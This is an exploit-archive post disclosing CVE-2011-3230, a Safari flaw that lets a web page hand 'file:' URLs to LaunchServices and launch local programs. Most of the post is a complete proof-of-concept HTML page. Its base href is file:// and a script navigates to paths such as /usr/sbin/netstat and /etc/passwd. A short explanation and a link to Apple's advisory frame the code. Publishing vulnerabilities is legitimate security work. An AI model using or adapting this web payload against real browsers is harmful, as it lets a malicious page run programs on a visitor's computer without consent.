Home / exploits Apple Safari Arbitrary Code Execution
Posted on 15 October 2011
CVE: CVE-2011-3230 Found By: Aaron Sigel of vtty.com There's not a ton to say about this bug aside from "Yikes"! I think the PoC speaks for itself. This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page. The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it. Other than that, you can run or launch anything you can access by using the method in the html provided below. <html> <head> <base href="file://"> <script> function DoIt() { alert(document.getElementById("cmdToRun").value); document.location=document.getElementById("cmdToRun").value; } </script> </head> <body> <select id="cmdToRun"> <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option> <option value="/etc/passwd">Launch /etc/passwd</option> <option value="/Applications/Utilities/Bluetooth File Exchange.app"> Launch Bluetooth File Exchange.app</option> </select> <br /> <input type=button value="Launch" onclick="DoIt()"> <br /> </body> </html> Apple's advisory: http://support.apple.com/kb/HT5000
